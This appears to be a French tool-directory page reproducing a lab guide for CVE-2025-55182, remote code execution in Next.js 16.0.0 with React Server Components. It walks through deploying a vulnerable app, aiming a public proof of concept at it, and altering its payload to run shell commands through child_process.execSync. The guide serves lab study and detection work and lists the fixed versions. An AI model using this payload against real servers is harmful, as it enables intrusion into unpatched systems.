Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-55182-poc-test — Laboratoire reproductible démontrant l'exécution de code à distance CVE-2025-55182 contre Next.js 16.0.0 avec les composants serveur React, incluant l'exécution d'exploit externe et la vérification des effets secondaires. | Kitploit
Outils/GitHubGitHub/jandelima/cve-2025-55182-poc-test
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubjandelima/cve-2025-55182-poc-test

cve-2025-55182-poc-test

Laboratoire reproductible démontrant l'exécution de code à distance CVE-2025-55182 contre Next.js 16.0.0 avec les composants serveur React, incluant l'exécution d'exploit externe et la vérification des effets secondaires.

Voir le dépôt
3il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Laboratoire de démonstration CVE-2025-55182 (Next.js / React RSC RCE)

Ce document fournit une configuration complète et reproductible pour démontrer l'exécution de code à distance (RCE) CVE-2025-55182 contre un environnement vulnérable Next.js + React Server Components fonctionnant dans une VM Ubuntu Multipass.

L'exploit est exécuté depuis l'extérieur de la VM, prouvant l'exploitabilité à distance et préparant l'environnement pour la détection de comportements anormaux.

Source : https://github.com/ejpir/CVE-2025-55182-research


1. Créer et préparer la VM Ubuntu

2. Configuration de base à l'intérieur de la VM

2.1 Mettre à jour le système et installer les dépendances

root@kitploit:~
sudo apt update && sudo apt upgrade -y
sudo apt install -y curl git build-essential

2.2 Installer Node.js LTS (20.x)

root@kitploit:~
curl -fsSL https://deb.nodesource.com/setup_20.x | sudo -E bash -
sudo apt install -y nodejs

Vérifier :

root@kitploit:~
node -v
npm -v

2.3 Créer un utilisateur dédié pour l'application

root@kitploit:~
sudo adduser reactlab
sudo usermod -aG sudo reactlab
su - reactlab

3. Déployer l'application Next.js vulnérable

3.1 Créer le répertoire de travail

root@kitploit:~
mkdir ~/react2shell-lab
cd ~/react2shell-lab

3.2 Générer un projet Next.js App Router minimal

root@kitploit:~
npx create-next-app@latest vulnerable-app
cd vulnerable-app

3.3 Épingler les versions vulnérables dans package.json

Modifier les dépendances :

root@kitploit:~
"dependencies": {
  "next": "16.0.0",
  "react": "19.1.0",
  "react-dom": "19.1.0"
}

Réinstaller les paquets :

root@kitploit:~
rm -rf node_modules package-lock.json
npm install

Vérifier :

root@kitploit:~
npm list react react-dom next

Attendu :

root@kitploit:~
[email protected]
[email protected]
[email protected]

3.4 Construire et exécuter en mode production

root@kitploit:~
npm run build
npm start

Sortie attendue :

root@kitploit:~
▲ Next.js 16.0.0
Local:   http://localhost:3000
Network: http://10.X.X.X:3000

démarrage


4. Confirmer l'accessibilité externe (Machine attaquante → VM)

Sur une autre machine :

root@kitploit:~
curl http://10.102.169.126:3000

Vous devriez recevoir la page HTML par défaut de Next.js.


5. Cloner et tester le PoC sur la machine attaquante

5.1 Cloner le dépôt

root@kitploit:~
cd ~
git clone https://github.com/ejpir/CVE-2025-55182-research
cd CVE-2025-55182-research

5.2 Pointer le PoC vers l'IP du serveur

Rechercher :

root@kitploit:~
hostname: 'localhost',

Remplacer par :

root@kitploit:~
hostname: '10.X.X.X',

5.3 Exécuter le PoC de base (console.log RCE simple)

Avec Next toujours en cours d'exécution :

root@kitploit:~
node test-simple.cjs

Attendu dans le terminal Next.js :

root@kitploit:~
NON-CHUNKED-RCE

Cela confirme l'exécution de code à distance via React Flight en utilisant les versions vulnérables.

confirmé


6. Modifier le PoC pour effectuer un effet secondaire visible (création de fichier)

L'objectif est de générer un comportement observable (système de fichiers + exécution de processus).

6.1 Modifier _prefix dans test-simple.cjs

Rechercher :

root@kitploit:~
"_prefix": "console.log('NON-CHUNKED-RCE');//"

Remplacer par :

root@kitploit:~
"_prefix": "process.mainModule.require('child_process').execSync('touch /tmp/cve-2025-55182-syscall');console.log('NON-CHUNKED-RCE');//"

Remarque : require n'est pas disponible dans le contexte d'exécution, mais process.mainModule.require() l'est.

6.2 Tester l'exploit modifié

Assurez-vous que Next est en cours d'exécution, puis :

root@kitploit:~
node test-simple.cjs

Vérifier la création du fichier :

root@kitploit:~
ls -l /tmp/

Vous devriez voir :

root@kitploit:~
cve-2025-55182-syscall

Cela confirme une RCE fonctionnelle avec des effets secondaires.

démarrage


Correctif :
React ≥ 19.2.1
Next.js ≥ 16.0.7

Télécharger l’outil